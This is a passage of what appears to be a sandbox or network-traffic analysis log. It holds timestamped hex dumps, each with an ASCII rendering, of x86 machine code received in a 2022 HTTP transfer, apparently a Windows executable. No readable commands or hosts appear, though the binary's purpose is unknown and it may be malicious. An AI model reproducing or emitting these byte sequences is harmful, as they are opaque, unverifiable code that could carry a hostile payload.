                                                                                                                                  Data Ascii: t$jt$P^jt$t$t$S\$VW_XuTuGTBpjSVbPVbVt$S~Sb_^[jt$t$^VvT]t$vhFTIvPFh^USVWEP3VWhxwh]}}}`u
                                                                                                                                  2022-01-28 20:04:54 UTC101INData Raw: 4e 04 02 00 00 80 8b 45 0c 5e eb 03 83 c8 ff 5f 5b 5d c2 0c 00 55 8b ec 53 8b 5d 08 8b 45 0c 8b 55 10 8b 4d 14 83 7b 10 00 74 1d 3b 03 74 05 83 c3 18 eb f1 3b 53 04 75 f6 3b 4b 08 72 f1 3b 4b 0c 77 ec 89 5d 08 eb 05 33 c0 89 45 08 8b 45 08 5b 5d c2 10 00 55 8b ec 51 83 65 fc 00 56 8b f1 8b 06 8d 4d fc 51 ff 75 10 8b ce ff 75 0c ff 75 08 ff 90 0c 01 00 00 85 c0 75 16 ff 75 10 8b 06 ff 75 0c 8b ce ff 75 08 ff 90 10 01 00 00 89 45 fc 8b 45 fc 5e c9 c2 0c 00 56 8b f1 e8 00 bf ff ff c7 06 e4 7d 04 10 c7 46 28 01 00 00 00 8b c6 5e c3 8b 44 24 04 89 41 28 c7 41 18 01 00 00 00 c2 04 00 56 8b f1 e8 a5 47 00 00 83 7c 24 0c 00 75 05 25 ff fd ff ff 50 6a 00 8b ce e8 75 47 00 00 50 ff 74 24 14 ff 15 e4 63 04 10 5e c2 08 00 b8 84 79 04 10 c3 55 8b ec ff 75 1c ff 75 18
                                                                                                                                  Data Ascii: NE^_[]US]EUM{t;t;Su;Kr;Kw]3EE[]UQeVMQuuuuuuuEE^V}F(^D$A(AVG|$u%PjuGPt$c^yUuu
                                                                                                                                  2022-01-28 20:04:54 UTC109INData Raw: 30 5b 01 10 b9 a4 75 05 10 e8 2e 58 00 00 85 c0 75 05 e8 f0 4d 00 00 ff 74 24 08 8b 16 ff 70 64 8b ce ff 70 60 ff 70 5c ff 92 18 01 00 00 5e c2 04 00 56 8b f1 83 7e 4c 00 74 0f 8b 4e 4c 8b 01 ff 90 90 00 00 00 85 c0 75 07 8b ce e8 63 fb ff ff 5e c2 04 00 53 56 57 8b d9 e8 77 29 00 00 a9 00 00 00 40 75 46 e8 ed 96 ff ff 8b f0 85 f6 74 3b 8b 3d dc 64 04 10 6a 10 ff d7 66 85 c0 7c 2c 6a 11 ff d7 66 85 c0 7c 23 6a 12 ff d7 66 85 c0 7c 1a 6a 00 68 46 e1 00 00 68 11 01 00 00 ff 76 20 ff 15 30 64 04 10 33 c0 40 eb 0d 8b cb e8 01 fb ff ff f7 d8 1b c0 f7 d8 5f 5e 5b c2 04 00 55 8b ec 51 56 8b f1 80 7e 24 00 75 07 e8 e3 fa ff ff eb 23 8b 06 83 65 fc 00 8d 4d fc 51 ff 75 0c 8b ce ff 75 08 ff 90 e4 00 00 00 85 c0 7d 04 8b ce eb d9 8b 45 fc 5e c9 c2 08 00 56 8b f1 8b
                                                                                                                                  Data Ascii: 0[u.XuMt$pdp`p\^V~LtNLuc^SVWw)@uFt;=djf|,jf|#jf|jhFhv 0d3@_^[UQV~$u#eMQuu}E^V
                                                                                                                                  2022-01-28 20:04:54 UTC117INData Raw: eb 36 8d 90 ce fe ff ff 83 fa 06 77 29 8b 55 0c 57 8b 7d 14 05 ce fe ff ff 57 89 45 fc 8d 45 f4 50 33 f6 56 68 19 bc 00 00 89 55 f8 e8 fb f8 ff ff 39 37 5f 75 02 33 c0 5e c9 c2 10 00 83 25 c0 5a 05 10 00 56 8b f1 83 7e 4c 00 74 0d 8b 4e 4c 8b 01 68 3f fd ff ff ff 50 50 6a 00 6a 00 8b ce e8 e7 ef ff ff 5e c2 08 00 6a 14 b8 09 43 04 10 e8 fb 38 01 00 8b 75 08 33 ff 3b f7 75 07 b8 03 40 00 80 eb 4e 6a 18 89 3e c7 45 ec 0e 00 07 80 89 7d fc e8 6a 70 ff ff 59 8b c8 89 4d e4 3b cf c6 45 fc 01 74 08 57 e8 38 f0 ff ff eb 19 33 c0 eb 15 8b 4d e0 e8 59 2c 00 00 b8 aa d4 01 10 c3 8b 75 08 33 ff 8b c7 3b c7 74 03 89 7d ec 89 06 8b 45 ec e8 3d 39 01 00 c2 04 00 55 81 ec 00 02 00 00 8d 6c 24 fc a1 cc 45 05 10 33 c5 89 85 00 02 00 00 6a 0c b8 2c 43 04 10 e8 71 38 01 00
                                                                                                                                  Data Ascii: 6w)UW}WEEP3VhU97_u3^%ZV~LtNLh?PPjj^jC8u3;u@Nj>E}jpYM;EtW83MY,u3;t}E=9Ul$E3j,Cq8
                                                                                                                                  2022-01-28 20:04:54 UTC125INData Raw: 74 03 8b 43 04 50 51 ff d7 8b 76 08 85 f6 74 0f 85 db 75 04 33 c0 eb 03 8b 43 04 50 56 ff d7 50 e8 f1 fe ff ff 5f 5e 5b c2 04 00 56 8b f1 e8 11 fd ff ff f6 44 24 08 01 74 07 56 e8 6d 52 ff ff 59 8b c6 5e c2 04 00 56 8b f1 e8 84 fd ff ff f6 44 24 08 01 74 07 56 e8 51 52 ff ff 59 8b c6 5e c2 04 00 56 8b f1 e8 f7 fd ff ff f6 44 24 08 01 74 07 56 e8 35 52 ff ff 59 8b c6 5e c2 04 00 e9 c2 19 00 00 a1 94 75 05 10 85 c0 74 02 ff e0 c2 04 00 a1 98 75 05 10 85 c0 74 02 ff e0 33 c0 c2 08 00 a1 9c 75 05 10 85 c0 74 02 ff e0 33 c0 c2 08 00 83 7c 24 08 00 75 05 e8 c9 0e 00 00 83 3d 98 75 05 10 00 74 15 ff 74 24 08 ff 74 24 08 e8 be ff ff ff f7 d8 1b c0 f7 d8 eb 03 6a 02 58 c2 08 00 56 8b f1 8d 46 20 50 ff 15 e8 61 04 10 85 c0 75 22 8b 46 1c 85 c0 74 0a 8b 08 50 ff 51
                                                                                                                                  Data Ascii: tCPQvtu3CPVP_^[VD$tVmRY^VD$tVQRY^VD$tV5RY^utut3ut3|$u=utt$t$jXVF Pau"FtPQ
                                                                                                                                  2022-01-28 20:04:54 UTC133INData Raw: f4 ff ff 8b f0 85 f6 74 65 85 ff 74 61 8b 46 0c 85 c0 74 0f 50 e8 30 22 01 00 3b 87 98 00 00 00 59 73 4b 83 bf 98 00 00 00 00 74 42 8b 46 0c 83 65 08 00 85 c0 74 13 50 e8 0d 22 01 00 ff 76 0c 89 45 08 e8 b7 e7 00 00 59 59 ff b7 98 00 00 00 e8 e7 e6 00 00 85 c0 59 89 46 0c 75 11 39 45 08 74 0c ff 75 08 e8 d2 e6 00 00 59 89 46 0c 5f 33 c0 39 43 10 5e 0f 95 c0 5b 5d c2 04 00 8b 44 24 08 ff 30 8b 4c 24 08 e8 60 5e ff ff f7 d8 1b c0 40 c3 33 c0 c2 10 00 b8 10 89 04 10 c3 55 8b ec 83 7d 0c 00 56 8b f1 75 04 33 c0 eb 2b 6a 00 8d 45 0c 50 ff 75 0c ff 75 08 ff 76 04 ff 15 a4 61 04 10 85 c0 75 0f ff 76 0c ff 15 60 62 04 10 50 e8 74 b1 00 00 8b 45 0c 5e 5d c2 08 00 55 8b ec 56 57 8b 7d 0c 85 ff 8b f1 74 37 6a 00 8d 45 0c 50 57 ff 75 08 ff 76 04 ff 15 a0 61 04 10 85
                                                                                                                                  Data Ascii: tetaFtP0";YsKtBFetP"vEYYYFu9EtuYF_39C^[]D$0L$`^@3U}Vu3+jEPuuvauv`bPtE^]UVW}t7jEPWuva
                                                                                                                                  2022-01-28 20:04:54 UTC140INData Raw: fc ff eb 13 8b 4d e4 e8 07 d0 ff ff b8 fc 30 02 10 c3 8b 75 e8 33 db 8b 4d ec 3b cb 75 07 33 c0 e9 aa 00 00 00 8b 45 10 83 38 02 74 17 ff 75 24 ff 75 20 ff 75 1c ff 75 18 50 ff 75 08 e8 12 11 00 00 eb 23 ff 75 30 8b 01 ff 75 2c ff 75 28 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 0c ff 75 08 ff 50 50 33 c9 85 c0 0f 9d c1 3b cb 89 4d 24 74 49 6a 0c e8 86 13 ff ff 3b c3 59 74 0d 8b 4d ec 89 18 89 48 04 89 58 08 eb 02 33 c0 50 8d 4e 40 e8 76 88 00 00 8b 45 ec 39 58 24 74 12 ff 70 24 8d 4e 24 8b f8 e8 9a 81 00 00 89 38 8b 45 ec 8b 4d 34 3b cb 74 12 89 01 eb 0e 8b 4d ec 3b cb 74 07 8b 01 6a 01 ff 50 04 8b 45 24 e8 41 dc 00 00 c2 30 00 55 8b ec 83 ec 30 a1 cc 45 05 10 33 c5 89 45 fc 53 56 8b 75 1c 8b 45 0c 83 65 e8 00 57 89 75 dc 8b 75 24 89 75 e0 8b 75
                                                                                                                                  Data Ascii: M0u3M;u3E8tu$u uuPu#u0u,u(u$u uuuuuPP3;M$tIj;YtMHX3PN@vE9X$tp$N$8EM4;tM;tjPE$A0U0E3ESVuEeWuu$uu
                                                                                                                                  2022-01-28 20:04:54 UTC148INData Raw: ff 74 24 08 8d 4e 18 e8 03 69 00 00 eb 1f ff 50 14 6a 00 ff 74 24 0c 83 c6 18 8b ce e8 18 68 00 00 85 c0 74 08 50 8b ce e8 cc 67 00 00 5e c2 08 00 66 8b 54 24 0c 8b c1 33 c9 89 08 66 89 50 04 8b 54 24 08 89 48 0c 89 48 14 8b 4c 24 04 89 50 08 89 48 18 c2 0c 00 8b 44 24 04 89 01 c2 04 00 8b 41 18 c3 56 8b f1 83 7e 0c 00 75 04 33 c0 5e c3 8b 4e 0c 8b 01 ff 90 b4 00 00 00 8b 46 0c 8b 88 90 00 00 00 8b 01 6a 01 56 ff 50 04 8b 46 0c 8b 88 90 00 00 00 8b 01 5e ff 20 8b 44 24 0c 85 c0 74 03 83 20 00 8b 89 94 00 00 00 eb 0c 8b 41 08 3b 44 24 04 74 09 8b 49 18 85 c9 75 f0 eb 0b e8 9f ff ff ff 8b 4c 24 08 89 01 33 c0 c2 0c 00 33 c0 c2 04 00 68 3c b6 04 10 ff 74 24 0c e8 71 00 ff ff 85 c0 59 59 75 1b 68 dc b5 04 10 ff 74 24 0c e8 5d 00 ff ff 85 c0 59 59 75 07 b8 02
                                                                                                                                  Data Ascii: t$NiPjt$htPg^fT$3fPT$HHL$PHD$AV~u3^NFjVPF^ D$t A;D$tIuL$33h<t$qYYuht$]YYu
                                                                                                                                  2022-01-28 20:04:54 UTC156INData Raw: 33 c0 40 eb 17 6a 07 eb 12 6a 05 eb 0e 6a 04 eb 0a 6a 06 eb 06 6a 03 eb 02 6a 02 58 8b 55 14 83 4d e0 ff 89 45 fc 8d 45 dc 50 c7 45 dc 03 00 00 00 89 7d e4 89 7d e8 89 7d ec 89 7d f4 89 55 f8 e8 64 d8 ff ff 8b 45 f4 eb b0 8d 49 00 7f 6f 02 10 73 6f 02 10 7b 6f 02 10 6f 6f 02 10 83 6f 02 10 6a 6f 02 10 77 6f 02 10 59 6f 02 10 00 01 02 07 07 03 03 03 02 02 03 03 07 07 03 03 07 07 03 01 03 07 02 04 05 07 07 07 07 07 06 56 8b f1 ff 36 e8 17 d5 fe ff 83 26 00 59 5e c3 53 55 56 8b f1 8b 46 08 8b 58 04 57 33 ed 33 ff 85 db 76 20 8b 4e 08 57 e8 76 e3 ff ff 84 c0 74 0e 57 8b ce e8 38 e2 ff ff 8b e8 85 ed 7c 05 47 3b fb 72 e0 5f 5e 8b c5 5d 5b c3 55 8b ec 51 51 83 65 f8 00 56 8b f1 e8 f5 e1 ff ff 8d 55 fc 52 8d 55 f8 52 33 d2 38 55 0c 8d 46 0c 0f 95 c2 89 45 fc 8b
                                                                                                                                  Data Ascii: 3@jjjjjjXUMEEPE}}}}UdEIoso{oooojowoYoV6&Y^SUVFXW33v NWvtW8|G;r_^][UQQeVURUR38UFE
                                                                                                                                  2022-01-28 20:04:54 UTC164INData Raw: 46 0c 8b 08 8d 55 cc 52 50 ff 51 18 3b c3 0f 8c 32 fe ff ff 39 7d cc 75 12 8b 46 0c 8b 08 57 50 ff 51 0c 3b c3 0f 8c 1b fe ff ff 89 7e 44 8b 45 d8 8b 08 50 ff 51 08 39 5d d4 0f 85 7a ff ff ff 39 5d e4 0f 8e fb fd ff ff 8b 46 0c 8b 08 53 53 53 50 ff 51 1c 8b f8 3b fb 89 5e 44 0f 8d e2 fd ff ff 8b 06 8b ce ff 50 10 8b c7 e9 d6 fd ff ff 8b 87 b4 00 00 00 66 39 18 0f 85 b7 fe ff ff 83 4d e0 ff e9 b7 fe ff ff 6a 08 b8 cf 49 04 10 e8 29 7d 00 00 8b 75 08 ff b6 34 ff ff ff 8d 4d ec e8 39 6a ff ff 33 ff 83 7d 10 0e 89 7d fc 75 79 8b 76 a8 3b f7 74 72 8b 46 50 33 c9 3b c7 0f 95 c1 3b cf 75 05 e8 bd 71 ff ff 8b 4e 54 33 d2 3b cf 0f 95 c2 3b d7 74 ed ff 30 e8 af ee ff ff 8b 4e 54 e8 c2 ae ff ff 8b 46 50 ff 30 8b 4e 54 e8 a4 ef ff ff 8b 46 54 8b 40 0c 39 46 10 74 2a
                                                                                                                                  Data Ascii: FURPQ;29}uFWPQ;~DEPQ9]z9]FSSSPQ;^DPf9MjI)}u4M9j3}}uyv;trFP3;;uqNT3;;t0NTFP0NTFT@9Ft*
                                                                                                                                  2022-01-28 20:04:54 UTC172INData Raw: 7e 14 89 7e 1c 5f 5e c2 08 00 56 57 8b 7c 24 10 85 ff 8b f1 75 04 33 c0 eb 3c 83 7c 24 0c 00 75 05 e8 e1 53 ff ff 8b 4e 14 8b 46 1c 3b c8 77 e6 8d 14 39 3b d0 77 04 3b d1 73 04 2b c1 8b f8 8b 56 20 8b 06 57 03 d1 52 ff 74 24 14 8b ce ff 50 5c 01 7e 14 8b c7 5f 5e c2 08 00 56 57 8b 7c 24 10 85 ff 8b f1 74 4e 83 7c 24 0c 00 75 05 e8 94 53 ff ff 8b 46 14 8d 0c 38 3b c8 72 f1 3b 4e 18 76 08 8b 06 51 8b ce ff 50 64 8b 46 14 8d 0c 38 3b 4e 18 77 d9 8b 4e 20 8b 16 57 ff 74 24 10 03 c8 51 8b ce ff 52 5c 01 7e 14 8b 46 14 3b 46 1c 76 03 89 46 1c 5f 5e c2 08 00 55 8b ec 56 57 8b f9 8b 77 14 33 c9 33 c0 39 4d 10 75 08 8b 75 08 8b 45 0c eb 39 83 7d 10 01 75 0c 8b 55 08 03 f2 8b 55 0c 13 c2 eb 27 83 7d 10 02 75 3b 39 4d 0c 7c 11 7f 05 39 4d 08 76 0a 51 6a ff 6a 09 e8
                                                                                                                                  Data Ascii: ~~_^VW|$u3<|$uSNF;w9;w;s+V WRt$P\~_^VW|$tN|$uSF8;r;NvQPdF8;NwN Wt$QR\~F;FvF_^UVWw339MuuE9}uUU'}u;9M|9MvQjj
                                                                                                                                  2022-01-28 20:04:54 UTC180INData Raw: 8b f1 83 7e 04 00 c7 06 f8 92 04 10 74 2b 57 33 ff 39 7e 08 7e 19 53 33 db 8b 4e 04 6a 00 03 cb e8 89 fc ff ff 47 83 c3 0c 3b 7e 08 7c eb 5b ff 76 04 e8 f6 76 fe ff 59 5f 5e c3 56 57 8b 7c 24 0c 8b 47 18 f7 d0 a8 01 8b f1 8b cf 74 0a ff 76 08 e8 63 5b ff ff eb 0f e8 88 5b ff ff 6a ff 50 8b ce e8 92 fc ff ff ff 76 08 ff 76 04 57 e8 8a fe ff ff 5f 5e c2 04 00 56 8b f1 e8 7f ff ff ff f6 44 24 08 01 74 07 56 e8 a0 76 fe ff 59 8b c6 5e c2 04 00 e9 66 ff ff ff 56 57 8b 7c 24 0c 85 ff 8b f1 7d 05 e8 5d 33 ff ff 3b 7e 08 7c 0b 6a ff 8d 47 01 50 e8 3f fc ff ff ff 74 24 10 8b cf 6b c9 0c 03 4e 04 e8 b8 fe ff ff 5f 5e c2 08 00 56 8b f1 8b 4e 18 83 e9 10 c7 06 08 93 04 10 e8 f2 43 fd ff 8b 4e 14 83 e9 10 e8 e7 43 fd ff 8b 4e 0c 83 e9 10 5e e9 db 43 fd ff 56 8b f1 e8
                                                                                                                                  Data Ascii: ~t+W39~~S3NjG;~|[vvY_^VW|$Gtvc[[jPvvW_^VD$tVvY^fVW|$}]3;~|jGP?t$kN_^VNCNCN^CV
                                                                                                                                  2022-01-28 20:04:54 UTC187INData Raw: 3c 40 1f 00 00 89 4e 30 89 4e 20 8b c6 5e c3 81 79 34 fe ff ff 3f 72 0a ff 71 14 6a 05 e8 71 37 ff ff c3 6a 04 b8 73 50 04 10 e8 8e 20 00 00 8b f1 8b 46 18 33 db f7 d0 43 33 ff 84 c3 74 6a 39 7e 38 75 40 6a 1c e8 37 58 fe ff 59 8b c8 89 4d f0 3b cf 89 7d fc 74 0a ff 76 40 e8 e1 c5 ff ff eb 02 33 c0 83 4d fc ff 53 ff 76 44 8b c8 89 46 38 e8 ca c3 ff ff 8b 4e 38 57 e8 49 c6 ff ff 89 38 89 5e 34 39 7d 08 0f 84 87 00 00 00 8b ce e8 7b ff ff ff ff 75 08 8b 4e 38 e8 29 c6 ff ff 8b 4e 34 89 08 ff 46 34 eb 6b 39 7e 38 75 44 6a 14 e8 cd 57 fe ff 59 8b c8 89 4d f0 3b cf 89 5d fc 74 07 e8 36 04 00 00 eb 02 33 c0 ff 76 40 83 4d fc ff 53 8b c8 89 46 38 e8 d3 f7 ff ff 8b 46 38 39 78 08 7f 05 e8 9d 14 ff ff 8b 40 04 89 38 89 5e 34 39 7d 08 74 1d 8b ce e8 11 ff ff ff 8b
                                                                                                                                  Data Ascii: <@N0N ^y4?rqjq7jsP F3C3tj9~8u@j7XYM;}tv@3MSvDF8N8WI8^49}{uN8)N4F4k9~8uDjWYM;]t63v@MSF8F89x@8^49}t
                                                                                                                                  2022-01-28 20:04:54 UTC195INData Raw: 45 e4 85 c0 0f 84 83 00 00 00 57 56 53 e8 44 19 fe ff 89 45 e4 83 fe 01 75 24 85 c0 75 20 57 50 53 e8 30 19 fe ff 57 6a 00 53 e8 9e fd ff ff a1 a8 9b 04 10 85 c0 74 06 57 6a 00 53 ff d0 85 f6 74 05 83 fe 03 75 26 57 56 53 e8 7e fd ff ff 85 c0 75 03 21 45 e4 83 7d e4 00 74 11 a1 a8 9b 04 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 c7 45 fc fe ff ff ff 8b 45 e4 eb 1d 8b 45 ec 8b 08 8b 09 50 51 e8 61 83 00 00 59 59 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 e8 78 1e 00 00 c3 83 7c 24 08 01 75 05 e8 5b 83 00 00 ff 74 24 04 8b 4c 24 10 8b 54 24 0c e8 ed fe ff ff 59 c2 0c 00 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24 0c 53 56 57 89 28 8b e8 a1 cc 45 05 10 33 c5 50 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 a3 00 00 00 00 c3 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24
                                                                                                                                  Data Ascii: EWVSDEu$u WPS0WjStWjStu&WVS~u!E}ttWVSEEEEPQaYYeE3x|$u[t$L$T$YPd5D$+d$SVW(E3PuEEdPd5D$+d$
                                                                                                                                  2022-01-28 20:04:54 UTC203INData Raw: 45 1c 3b c3 59 59 89 7e 54 75 03 8d 45 10 50 ff 75 18 56 68 09 2a 03 10 ff 75 0c ff 75 08 ff 15 e0 60 04 10 3b c3 75 20 ff 15 60 62 04 10 89 45 fc 56 e8 48 cf ff ff 39 5d fc 59 74 09 ff 75 fc e8 eb e6 ff ff 59 33 c0 5e 5f 5b c9 c3 cc 68 60 04 03 10 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 cc 45 05 10 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 8b 44 24 04 85 c0 56 8b f1 c6 46 0c 00 75 63 e8 47 27 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 20 53 05 10 74 12 8b 0d 3c 52 05 10 85 48 70 75 07 e8 89 80 00 00 89 06 8b 46 04 3b 05 40 51 05 10 74 16 8b 46 08 8b 0d 3c 52 05 10 85 48 70 75 08 e8
                                                                                                                                  Data Ascii: E;YY~TuEPuVh*uu`;u `bEVH9]YtuY3^_[h`d5D$l$l$+SVWE1E3PeuEEEEdMdY__^[]QD$VFucG'FHlHhN; St<RHpuF;@QtF<RHpu
                                                                                                                                  2022-01-28 20:04:54 UTC211INData Raw: f8 fb ff ff 83 c4 28 85 c0 74 07 56 50 e8 5b a9 ff ff 5d c3 55 8b ec 51 51 56 8b 75 08 81 3e 03 00 00 80 0f 84 da 00 00 00 57 e8 d3 07 00 00 83 b8 80 00 00 00 00 74 3f e8 c5 07 00 00 8d b8 80 00 00 00 e8 73 05 00 00 39 07 74 2b 81 3e 4d 4f 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 56 e8 f0 a9 ff ff 83 c4 1c 85 c0 0f 85 8b 00 00 00 8b 7d 18 83 7f 0c 00 75 05 e8 ef 0a 00 00 8b 75 1c 8d 45 f8 50 8d 45 fc 50 56 ff 75 20 57 e8 34 ab ff ff 8b f8 8b 45 fc 83 c4 14 3b 45 f8 73 5b 53 3b 37 7c 47 3b 77 04 7f 42 8b 47 0c 8b 4f 10 c1 e0 04 03 c1 8b 48 f4 85 c9 74 06 80 79 08 00 75 2a 8d 58 f0 f6 03 40 75 22 ff 75 24 8b 75 0c ff 75 20 6a 00 ff 75 18 ff 75 14 ff 75 10 ff 75 08 e8 bb fe ff ff 8b 75 1c 83 c4 1c ff 45 fc 8b 45 fc 83 c7 14 3b 45 f8
                                                                                                                                  Data Ascii: (tVP[]UQQVu>Wt?s9t+>MOCt#u$u uuuuV}uuEPEPVu W4E;Es[S;7|G;wBGOHtyu*X@u"u$uu juuuuuEE;E
                                                                                                                                  2022-01-28 20:04:54 UTC218INData Raw: 00 8d bf 80 00 00 00 49 75 a3 8b 75 f8 8b 7d fc 8b e5 5d c3 55 8b ec 83 ec 1c 89 7d f4 89 75 f8 89 5d fc 8b 5d 0c 8b c3 99 8b c8 8b 45 08 33 ca 2b ca 83 e1 0f 33 ca 2b ca 99 8b f8 33 fa 2b fa 83 e7 0f 33 fa 2b fa 8b d1 0b d7 75 4a 8b 75 10 8b ce 83 e1 7f 89 4d e8 3b f1 74 13 2b f1 56 53 50 e8 27 ff ff ff 83 c4 0c 8b 45 08 8b 4d e8 85 c9 74 77 8b 5d 10 8b 55 0c 03 d3 2b d1 89 55 ec 03 d8 2b d9 89 5d f0 8b 75 ec 8b 7d f0 8b 4d e8 f3 a4 8b 45 08 eb 53 3b cf 75 35 f7 d9 83 c1 10 89 4d e4 8b 75 0c 8b 7d 08 8b 4d e4 f3 a4 8b 4d 08 03 4d e4 8b 55 0c 03 55 e4 8b 45 10 2b 45 e4 50 52 51 e8 4c ff ff ff 83 c4 0c 8b 45 08 eb 1a 8b 75 0c 8b 7d 08 8b 4d 10 8b d1 c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 8b 45 08 8b 5d fc 8b 75 f8 8b 7d f4 8b e5 5d c3 83 25 44 95 05 10 00 e8
                                                                                                                                  Data Ascii: Iuu}]U}u]]E3+3+3+3+uJuM;t+VSP'EMtw]U+U+]u}MES;u5Mu}MMMUUE+EPRQLEu}ME]u}]%D
                                                                                                                                  2022-01-28 20:04:54 UTC226INData Raw: f8 83 ff ff 74 43 85 ff 74 3f 57 ff 15 10 61 04 10 85 c0 74 34 89 3e 25 ff 00 00 00 83 f8 02 75 06 80 4e 04 40 eb 09 83 f8 03 75 04 80 4e 04 08 68 a0 0f 00 00 8d 46 0c 50 e8 b0 09 00 00 59 59 85 c0 74 37 ff 46 08 eb 0a 80 4e 04 40 c7 06 fe ff ff ff 43 83 fb 03 0f 8c 67 ff ff ff ff 35 0c 84 05 10 ff 15 c4 62 04 10 33 c0 eb 11 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff 83 c8 ff e8 90 a1 ff ff c3 56 57 be 20 84 05 10 8b 3e 85 ff 74 31 8d 87 00 05 00 00 eb 1a 83 7f 08 00 74 0a 8d 47 0c 50 ff 15 b0 61 04 10 8b 06 83 c7 28 05 00 05 00 00 3b f8 72 e2 ff 36 e8 41 70 ff ff 83 26 00 59 83 c6 04 81 fe 20 85 05 10 7c be 5f 5e c3 53 33 db 39 1d 74 95 05 10 56 57 75 05 e8 5c 1f 00 00 8b 35 cc 78 05 10 33 ff 3b f3 75 18 83 c8 ff e9 9b 00 00 00 3c 3d 74 01 47 56 e8 f5 76
                                                                                                                                  Data Ascii: tCt?Wat4>%uN@uNhFPYYt7FN@Cg5b33@eEVW >t1tGPa(;r6Ap&Y |_^S39tVWu\5x3;u<=tGVv
                                                                                                                                  2022-01-28 20:04:54 UTC234INData Raw: 10 ab ab ab eb b2 39 35 2c 82 05 10 0f 85 90 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 12 50 ff ff c9 c3 6a 14 68 88 0d 05 10 e8 1e 83 ff ff 83 4d e0 ff e8 c9 aa ff ff 8b f8 89 7d dc e8 18 fd ff ff 8b 5f 68 8b 75 08 e8 b1 fd ff ff 89 45 08 3b 43 04 0f 84 57 01 00 00 68 20 02 00 00 e8 b2 af ff ff 59 8b d8 85 db 0f 84 46 01 00 00 b9 88 00 00 00 8b 77 68 8b fb f3 a5 83 23 00 53 ff 75 08 e8 f2 fd ff ff 59 59 89 45 e0 85 c0 0f 85 fc 00 00 00 8b 75 dc ff 76 68 ff 15 e8 61 04 10 85 c0 75 11 8b 46 68 3d 18 4d 05 10 74 07 50 e8 cb 51 ff ff 59 89 5e 68 53 8b 3d a8 61 04 10 ff d7 f6 46 70 02 0f 85 ea 00 00 00 f6 05 3c 52 05 10 01 0f 85 dd 00 00 00 6a 0d e8 d0 b1 ff ff 59 83 65 fc 00 8b 43 04 a3 3c 82 05 10 8b 43 08 a3 40 82 05 10 8b 43 0c a3 44 82 05 10 33 c0 89
                                                                                                                                  Data Ascii: 95,M_^3[PjhM}_huE;CWh YFwh#SuYYEuvhauFh=MtPQY^hS=aFp<RjYeC<C@CD3
                                                                                                                                  2022-01-28 20:04:54 UTC242INData Raw: 7e 44 8b c6 e8 59 f9 ff ff 8b 45 f0 8b 80 bc 00 00 00 8b 00 8a 00 88 06 8b 5b 04 46 85 db 7d 26 f7 db 80 7d 10 00 75 05 39 5d 0c 7c 03 89 5d 0c 8b 7d 0c 8b c6 e8 28 f9 ff ff 57 6a 30 56 e8 03 38 ff ff 83 c4 0c 80 7d fc 00 74 07 8b 45 f8 83 60 70 fd 33 c0 5f 5e 5b c9 c3 55 8b ec 83 ec 2c a1 cc 45 05 10 33 c5 89 45 fc 8b 45 08 53 56 57 8b 7d 0c 6a 16 5e 56 8d 4d e4 51 8d 4d d4 51 ff 70 04 ff 30 e8 f8 32 00 00 33 db 83 c4 14 3b fb 75 18 e8 73 49 ff ff 53 53 53 53 53 89 30 e8 c6 ae ff ff 83 c4 14 8b c6 eb 5a 8b 45 10 3b c3 76 e1 83 f8 ff 75 04 0b c0 eb 0b 33 c9 83 7d d4 2d 0f 94 c1 2b c1 8b 75 14 8d 4d d4 51 8b 4d d8 03 ce 51 50 33 c0 83 7d d4 2d 0f 94 c0 03 c7 50 e8 25 31 00 00 83 c4 10 3b c3 74 04 88 1f eb 15 ff 75 18 8d 45 d4 53 56 ff 75 10 8b cf e8 64 fe
                                                                                                                                  Data Ascii: ~DYE[F}&}u9]|]}(Wj0V8}tE`p3_^[U,E3EESVW}j^VMQMQp023;usISSSSS0ZE;vu3}-+uMQMQP3}-P%1;tuESVud
                                                                                                                                  2022-01-28 20:04:54 UTC250INData Raw: 14 e9 d5 04 00 00 f6 40 04 20 74 0f 6a 02 6a 00 6a 00 56 e8 81 fd ff ff 83 c4 10 56 e8 af f6 ff ff 85 c0 59 0f 84 f6 01 00 00 8b 07 f6 44 03 04 80 0f 84 e9 01 00 00 e8 46 6c ff ff 8b 40 6c 33 c9 39 48 14 8d 45 84 0f 94 c1 50 8b 07 ff 34 03 8b f1 ff 15 44 61 04 10 85 c0 0f 84 c0 01 00 00 85 f6 74 0a 80 7d ab 00 0f 84 b2 01 00 00 ff 15 40 61 04 10 83 65 b0 00 83 bd 28 05 00 00 00 8b 75 9c 89 45 84 89 75 8c 0f 86 ff 03 00 00 83 65 a4 00 eb 03 8b 75 8c 8a 45 ab 84 c0 0f 85 06 01 00 00 8a 06 33 c9 3c 0a 0f 94 c1 0f be c0 50 89 4d 88 e8 54 f8 ff ff 85 c0 59 75 1a 6a 01 8d 45 ac 56 50 e8 42 fb ff ff 83 c4 0c 83 f8 ff 0f 84 af 03 00 00 eb 30 8b 45 9c 2b c6 03 85 28 05 00 00 83 f8 01 0f 86 99 03 00 00 6a 02 8d 45 ac 56 50 e8 14 fb ff ff 83 c4 0c 83 f8 ff 0f 84 81
                                                                                                                                  Data Ascii: @ tjjjVVYDFl@l39HEP4Dat}@ae(uEueuE3<PMTYujEVPB0E+(jEVP
